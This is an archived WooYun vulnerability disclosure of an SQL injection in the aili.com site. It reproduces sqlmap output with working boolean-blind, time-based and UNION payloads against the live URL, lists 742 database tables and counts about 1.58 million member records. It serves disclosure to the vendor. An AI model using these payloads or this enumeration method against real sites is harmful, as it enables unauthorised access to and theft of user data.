乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-08: 厂商已经确认,细节仅向厂商公开 2015-09-18: 细节向核心白帽子及相关领域专家公开 2015-09-28: 细节向普通白帽子公开 2015-10-08: 细节向实习白帽子公开 2015-10-23: 细节向公众公开
我是川神唯一女徒弟,请不要送我男士的东东
川神再教我SQL注入时说先拿爱丽网练手吧,还能混个礼物,于是拿着川神的神器点啊点,然后突然就出结果了:http://plus.aili.com/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df%27
我才学了3天,什么是请求还不太懂,O(∩_∩)O~更不会用什么sqlmap了
于是川神说,把这个日志复制过去就可以了
web application technology: PHP 5.2.14back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] newcms[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)# Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #---web application technology: PHP 5.2.14back-end DBMS: MySQL 5.0Database: newcms[742 tables]+------------------------------------------+| Jewelry_arc_image || Jewelry_archives || Jewelry_category || Jewelry_vote_config || 7120_eastdata_sp || 7120_eastdata_ty || 7120_eastmedicine_sort || 7120_illnessbase || 7120_illtype || 7120_part || 7120_westdata_sp || 7120_westdata_ty || 7120_westmedicine_sort || a_77_images || a_bgfg_archives || a_notk_archives || a_notk_images || admin || admin_arc_upid || admin_count || admin_panel || admin_role || admin_role_cat || admin_role_priv || aili_adsell_brand || aili_adsell_type || aili_arc_star || aili_diyform1 || aili_diyform4 || aili_diyform5 || aili_diyforms || aili_diyforms_fields || aili_diyforms_help || aili_diyforms_zform || aili_diyforms_zform_fields || aili_feed || aili_feed_relation || aili_goods || aili_member || aili_member_deluser || aili_member_field || aili_member_keyfilter || aili_member_log || aili_member_logcate || aili_member_personal || aili_member_photo || aili_member_photocate || aili_member_prefer || aili_member_prefer_relation || aili_member_readnum || aili_member_room || aili_member_skin || aili_member_tags || aili_member_tags_relation || aili_member_visit || aili_member_visitnum || aili_sendweibo_conf || aili_sendweibo_users || aili_sph_counter || aili_star || aili_star_url || aili_store || aili_tags || aili_tags_art || aili_tags_attr || aili_tags_classify || aili_tags_classtags || aili_tags_email || aili_tags_push || aili_tags_recommend || aili_tags_tagAttr || aili_tags_tagsUser || aili_usercenter_beauty || aili_usercenter_glodblog || aili_usercenter_integralblog || aili_usercenter_rule || aili_usercenter_setbeauty || aili_usergroup_log || aili_weibo_attitude || aili_weibo_class || aili_weibo_discuss || aili_weibo_grade || aili_weibo_hot || aili_weibo_nums || aili_weibo_user || aili_weixin || aili_weixin_help || aili_weixin_payalarm || aili_weixin_paylog || aili_weixin_userinfo || ailimap || album_contents || album_contents_lip || albums || albums_lip || alone_page || api_menagement || app_ad || app_arc_topic || app_archives || app_channel || app_feedback || app_images || app_new_article || app_new_image || app_recommend || app_topic || app_version || arc_channel || arc_column || arc_flag || arc_flag_img || arc_hzp_pro || arc_index || arc_recom || arc_topic || archive_count || archive_total || archives || archives_gq || archives_jk || archives_lip || archives_peter || archivesbkpeter || article_img_new || articles || articles_img || articles_lip || articles_play_bak || authors || bishengyuan || bishengyuan_prize || block || block_art || category_priv || channel_count || channel_total || channels || cms_bbs_log || cms_bbs_relation || collection_content || collection_history || collection_node || collection_program || column_count || column_order_relation || column_total || columns || comment_admin_panel || comment_admin_role_priv || comment_bq || comment_comments || comment_menu || comment_sites || comment_templet_category || comment_templets || comment_total || comments || comments_topic || comments_topic_bak || crontab || cscdn_count || cscdn_log || database_query_log || domainip || dzxbb_common_relation || dzxbbs_common_addon || dzxbbs_common_admincp_cmenu || dzxbbs_common_admincp_group || dzxbbs_common_admincp_member || dzxbbs_common_admincp_perm || dzxbbs_common_admincp_session || dzxbbs_common_admingroup || dzxbbs_common_adminnote || dzxbbs_common_adminsession || dzxbbs_common_advertisement || dzxbbs_common_advertisement_custom || dzxbbs_common_banned || dzxbbs_common_block || dzxbbs_common_block_item || dzxbbs_common_block_item_archive || dzxbbs_common_block_item_data || dzxbbs_common_block_permission || dzxbbs_common_block_style || dzxbbs_common_cache || dzxbbs_common_credit_log || dzxbbs_common_credit_rule || dzxbbs_common_credit_rule_log || dzxbbs_common_credit_rule_log_field || dzxbbs_common_cron || dzxbbs_common_district || dzxbbs_common_diy_data || dzxbbs_common_domain || dzxbbs_common_failedlogin || dzxbbs_common_friendlink || dzxbbs_common_invite || dzxbbs_common_magic || dzxbbs_common_magiclog || dzxbbs_common_mailcron || dzxbbs_common_mailqueue || dzxbbs_common_member || dzxbbs_common_member_count || dzxbbs_common_member_field_forum || dzxbbs_common_member_field_home || dzxbbs_common_member_log || dzxbbs_common_member_magic || dzxbbs_common_member_profile || dzxbbs_common_member_profile_setting || dzxbbs_common_member_security || dzxbbs_common_member_stat_field || dzxbbs_common_member_stat_fieldcache || dzxbbs_common_member_stat_search || dzxbbs_common_member_stat_searchcache || dzxbbs_common_member_status || dzxbbs_common_member_validate || dzxbbs_common_member_verify || dzxbbs_common_member_verify_info || dzxbbs_common_myapp || dzxbbs_common_myapp_count || dzxbbs_common_myinvite || dzxbbs_common_mytask || dzxbbs_common_nav || dzxbbs_common_onlinetime || dzxbbs_common_plugin || dzxbbs_common_pluginvar || dzxbbs_common_process || dzxbbs_common_regip || dzxbbs_common_report || dzxbbs_common_searchindex || dzxbbs_common_secquestion || dzxbbs_common_session || dzxbbs_common_setting || dzxbbs_common_smiley || dzxbbs_common_sphinxcounter || dzxbbs_common_stat || dzxbbs_common_statuser || dzxbbs_common_style || dzxbbs_common_stylevar || dzxbbs_common_syscache || dzxbbs_common_task || dzxbbs_common_taskvar || dzxbbs_common_template || dzxbbs_common_template_block || dzxbbs_common_template_permission || dzxbbs_common_uin_black || dzxbbs_common_usergroup || dzxbbs_common_usergroup_field || dzxbbs_common_word || dzxbbs_connect_feedlog || dzxbbs_connect_memberbindlog || dzxbbs_connect_tlog || dzxbbs_dsu_paulsign || dzxbbs_dsu_paulsignset || dzxbbs_forum_access || dzxbbs_forum_activity || dzxbbs_forum_activityapply || dzxbbs_forum_announcement || dzxbbs_forum_attachment || dzxbbs_forum_attachmentfield || dzxbbs_forum_attachtype || dzxbbs_forum_bbcode || dzxbbs_forum_creditslog || dzxbbs_forum_debate || dzxbbs_forum_debatepost || dzxbbs_forum_faq || dzxbbs_forum_forum || dzxbbs_forum_forum_threadtable || dzxbbs_forum_forumfield || dzxbbs_forum_forumrecommend || dzxbbs_forum_groupcreditslog || dzxbbs_forum_groupfield || dzxbbs_forum_groupinvite || dzxbbs_forum_grouplevel || dzxbbs_forum_groupranking || dzxbbs_forum_groupuser || dzxbbs_forum_imagetype || dzxbbs_forum_medal || dzxbbs_forum_medallog || dzxbbs_forum_memberrecommend || dzxbbs_forum_moderator || dzxbbs_forum_modwork || dzxbbs_forum_onlinelist || dzxbbs_forum_order || dzxbbs_forum_poll || dzxbbs_forum_polloption || dzxbbs_forum_pollvoter || dzxbbs_forum_post || dzxbbs_forum_post_tableid || dzxbbs_forum_postcomment || dzxbbs_forum_postlog || dzxbbs_forum_postposition || dzxbbs_forum_poststick || dzxbbs_forum_promotion || dzxbbs_forum_ratelog || dzxbbs_forum_relatedthread || dzxbbs_forum_replaycontent || dzxbbs_forum_replaypost || dzxbbs_forum_replayposts || dzxbbs_forum_rsscache || dzxbbs_forum_spacecache || dzxbbs_forum_statlog || dzxbbs_forum_thread || dzxbbs_forum_threadclass || dzxbbs_forum_threadlog || dzxbbs_forum_threadmod || dzxbbs_forum_threadtype || dzxbbs_forum_trade || dzxbbs_forum_tradecomment || dzxbbs_forum_tradelog || dzxbbs_forum_typeoption || dzxbbs_forum_typeoptionvar || dzxbbs_forum_typevar || dzxbbs_forum_warning || dzxbbs_home_album || dzxbbs_home_album_category || dzxbbs_home_appcreditlog || dzxbbs_home_blacklist || dzxbbs_home_blog || dzxbbs_home_blog_category || dzxbbs_home_blogfield || dzxbbs_home_class || dzxbbs_home_click || dzxbbs_home_clickuser || dzxbbs_home_comment || dzxbbs_home_docomment || dzxbbs_home_doing || dzxbbs_home_favorite || dzxbbs_home_feed || dzxbbs_home_feed_app || dzxbbs_home_friend || dzxbbs_home_friend_request || dzxbbs_home_friendlog || dzxbbs_home_notification || dzxbbs_home_pic || dzxbbs_home_picfield || dzxbbs_home_poke || dzxbbs_home_pokearchive || dzxbbs_home_share || dzxbbs_home_show || dzxbbs_home_specialuser || dzxbbs_home_userapp || dzxbbs_home_userapp_stat || dzxbbs_home_userappfield || dzxbbs_home_viewlog || dzxbbs_home_visitor || dzxbbs_kx_bind_info || dzxbbs_kx_bind_thread || dzxbbs_kx_session || dzxbbs_moodwall || dzxbbs_myrepeats || dzxbbs_pointsmall_advertisement || dzxbbs_pointsmall_announcement || dzxbbs_pointsmall_custom || dzxbbs_pointsmall_product || dzxbbs_pointsmall_productorder || dzxbbs_pointsmall_productpost || dzxbbs_pointsmall_shippingorder || dzxbbs_portal_article_content || dzxbbs_portal_article_count || dzxbbs_portal_article_related || dzxbbs_portal_article_title || dzxbbs_portal_article_trash || dzxbbs_portal_attachment || dzxbbs_portal_category || dzxbbs_portal_category_permission || dzxbbs_portal_comment || dzxbbs_portal_topic || dzxbbs_portal_topic_pic || dzxbbs_prize_userinfo || dzxbbs_purifyhylanda || dzxbbs_qq_bind_info || dzxbbs_ucenter_admins || dzxbbs_ucenter_applications || dzxbbs_ucenter_badwords || dzxbbs_ucenter_domains || dzxbbs_ucenter_failedlogins || dzxbbs_ucenter_feeds || dzxbbs_ucenter_friends || dzxbbs_ucenter_mailqueue || dzxbbs_ucenter_memberfields || dzxbbs_ucenter_members || dzxbbs_ucenter_mergemembers || dzxbbs_ucenter_newpm || dzxbbs_ucenter_notelist || dzxbbs_ucenter_pms || dzxbbs_ucenter_protectedmembers || dzxbbs_ucenter_settings || dzxbbs_ucenter_sqlcache || dzxbbs_ucenter_tags || dzxbbs_ucenter_vars || dzxbbs_webim_histories || dzxbbs_webim_settings || dzxbbs_weibo_bind || dzxbbs_weibo_bind_user || dzxbbs_weibo_idol || dzxbbs_weibo_setting || dzxbbs_weibo_stat || dzxbbs_weibo_synlist || dzxbbs_weixin_bind_info || dzxbbs_xwb_bind_info || dzxbbs_xwb_bind_thread || dzxbbs_xwb_session || enterprise || enterprise_case || enterprise_evaluate || enterprise_evaluate_score || enterprise_info || enterprise_level || enterprise_type || exam_form || exam_form_element || exam_student || exam_student_title || exam_title || favorites || flag || friend_link || friend_link_class || haina_test || help || help_type || history_log || homepage || hot_tags || hot_tags_class || images || images_lip || imgs || index_count || keylist || keywords || log_albums || log_arccreate || log_articles || log_channels || log_columns || log_create || log_images || log_login || log_sys || log_templet_category || log_templets || log_topics || log_votes || mango_field || mango_member || mango_vote_config || menu || menu_message || message || miaobali || miaobali_userinfo || msnad || navigation || new_vote_answer || new_vote_main || new_vote_option || new_vote_problem || notice || pctag || people || people_contents || pk_cdata || pk_cdata_log || pk_comment || pk_comment_log || pk_tdata || pk_tdata_log || pk_themes || pro_admin || pro_admin_panel || pro_admin_role || pro_admin_role_priv || pro_announce || pro_attachment || pro_attachment_index || pro_attr || pro_badword || pro_block || pro_block_history || pro_block_priv || pro_brand || pro_brand_user || pro_business_try_apply || pro_buycar || pro_cache || pro_category || pro_category_priv || pro_category_relation || pro_collection_content || pro_collection_history || pro_collection_node || pro_collection_program || pro_comment || pro_comment_check || pro_comment_data_1 || pro_comment_relation || pro_comment_setting || pro_comment_table || pro_content_check || pro_copyfrom || pro_datacall || pro_dbsource || pro_dianping || pro_dianping_data || pro_dianping_type || pro_download || pro_download_data || pro_downservers || pro_extend_setting || pro_favorite || pro_hits || pro_ipbanned || pro_keylink || pro_link || pro_linkage || pro_log || pro_maillist || pro_member || pro_member_address || pro_member_detail || pro_member_group || pro_member_menu || pro_member_verify || pro_member_vip || pro_menu || pro_message || pro_message_data || pro_message_group || pro_model || pro_model_field || pro_module || pro_mood || pro_news || pro_news_data || pro_order || pro_page || pro_pay_account || pro_pay_payment || pro_pay_spend || pro_picture || pro_picture_data || pro_plugin || pro_plugin_var || pro_position || pro_position_data || pro_poster || pro_poster_201208 || pro_poster_201209 || pro_poster_201210 || pro_poster_201211 || pro_poster_201212 || pro_poster_201301 || pro_poster_201302 || pro_poster_201303 || pro_poster_201304 || pro_poster_201305 || pro_poster_201306 || pro_poster_201307 || pro_poster_201308 || pro_poster_201309 || pro_poster_201310 || pro_poster_201311 || pro_poster_201312 || pro_poster_201401 || pro_poster_201402 || pro_poster_201403 || pro_poster_201404 || pro_poster_201405 || pro_poster_201406 || pro_poster_201407 || pro_poster_201408 || pro_poster_201409 || pro_poster_201410 || pro_poster_201411 || pro_poster_201412 || pro_poster_201501 || pro_poster_201502 || pro_poster_201503 || pro_poster_201504 || pro_poster_201505 || pro_poster_201506 || pro_poster_201507 || pro_poster_201508 || pro_poster_201509 || pro_poster_space || pro_product_attr || pro_queue || pro_release_point || pro_search || pro_search_keyword || pro_session || pro_site || pro_sms_report || pro_sontag || pro_special || pro_special_c_data || pro_special_content || pro_sphinx_counter || pro_sso_admin || pro_sso_applications || pro_sso_members || pro_sso_messagequeue || pro_sso_session || pro_sso_settings || pro_tag || pro_template_bak || pro_times || pro_type || pro_urlrule || pro_vote_data || pro_vote_option || pro_vote_subject || pro_wap || pro_wap_type || pro_watch_brand_2 || pro_watch_brand_2_data || pro_workflow || pro_yp_brand || pro_yp_brand_data || pro_yp_buy || pro_yp_buy_data || pro_yp_certificate || pro_yp_clientfeed || pro_yp_company || pro_yp_cos_attain_cat || pro_yp_cos_attain_cat_conf || pro_yp_cos_attain_cat_xinde || pro_yp_cos_attain_conf || pro_yp_cos_attain_confs || pro_yp_cos_xinde_conf || pro_yp_cos_xinde_relation || pro_yp_count_think_huangzhuangpin_member || pro_yp_datacount || pro_yp_digital || pro_yp_digital_data || pro_yp_digital_view || pro_yp_fans || pro_yp_guestbook || pro_yp_huangzhuang_brand || pro_yp_huangzhuang_brand_arc || pro_yp_huangzhuang_brand_data || pro_yp_huazhuangpin || pro_yp_huazhuangpin_arc || pro_yp_huazhuangpin_data || pro_yp_huozhuangpin_url || pro_yp_hzp_analyse || pro_yp_hzp_useful || pro_yp_jubao || pro_yp_product || pro_yp_product_data || pro_yp_product_selfattr || pro_yp_product_top || pro_yp_relation || pro_yp_supplier || pro_yp_supplier_brand || pro_yp_supplier_product || pro_yp_think || pro_yp_think_img || pro_yp_try_analyse || pro_yp_try_application || pro_yp_try_applications || pro_yp_try_com_ip || pro_yp_try_comment || pro_yp_try_comment_img || pro_yp_try_cosmetic || pro_yp_try_dingyue_data || pro_yp_try_dingyue_user || pro_yp_try_experts || pro_yp_try_integral || pro_yp_try_integral_set || pro_yp_try_jour || pro_yp_try_manage || pro_yp_try_manage_data || pro_yp_try_pclady || pro_yp_try_placard || pro_yp_try_regular || pro_yp_try_relation || pro_yp_try_sentiment || pro_yp_try_top || pro_yp_try_useful || pro_yp_try_userinfo || pro_yp_wjthink || pro_yp_zhubao || pro_yp_zhubao_brand || pro_yp_zhubao_brand_data || pro_yp_zhubao_data || rtss || source || suggest || sys_config || sys_config_group || tags || tags_arc || tags_bbs || tags_category || tags_flink || tags_log || tags_relation || tags_upid || tagscate_channel || tarot_url || task || task_log || temp_archives || temp_fengxiongjianfei || temp_table || temp_tags || templet_canedit || templet_category || templets || tmp_tag4 || topic_block || topic_block_style || topic_count || topic_diy_data || topic_diy_tpl || topic_hallowmas_ip || topic_hallowmas_user || topic_history || topic_lab_user || topic_pic || topic_total || topic_uservote || topicad_type || topics || tpl_history || tpl_type || try_manage_view || tryer || video || vote || vote_comments || vote_count || vote_option || webnav || webnav_class || weixin_list || weixin_menu || weixin_message || yesky || zg_jiemeng |+------------------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)# Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #---web application technology: PHP 5.2.14back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=(SELECT (CASE WHEN (4055=4055) THEN 4055 ELSE 4055*(SELECT 4055 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 AND (SELECT * FROM (SELECT(SLEEP(5)))vuFe)# Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://plus.aili.com:80/topicLab/index.php?a=obllist&dosubmit=1&m=user&callback=jsonp1441610337285&r=0.27927674422971904&type=clothv3_index%df' or 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a6a71,0x7955714447467145586e,0x71786b6a71)-- #---web application technology: PHP 5.2.14back-end DBMS: MySQL 5.0Database: newcms+------------------------+---------+| Table | Entries |+------------------------+---------+| dzxbbs_ucenter_members | 1583148 |+------------------------+---------+
怎么打吗?修复神马的还不会,送个面膜
危害等级:高
漏洞Rank:18
确认时间:2015-09-08 11:31
补洞洞,走起……
暂无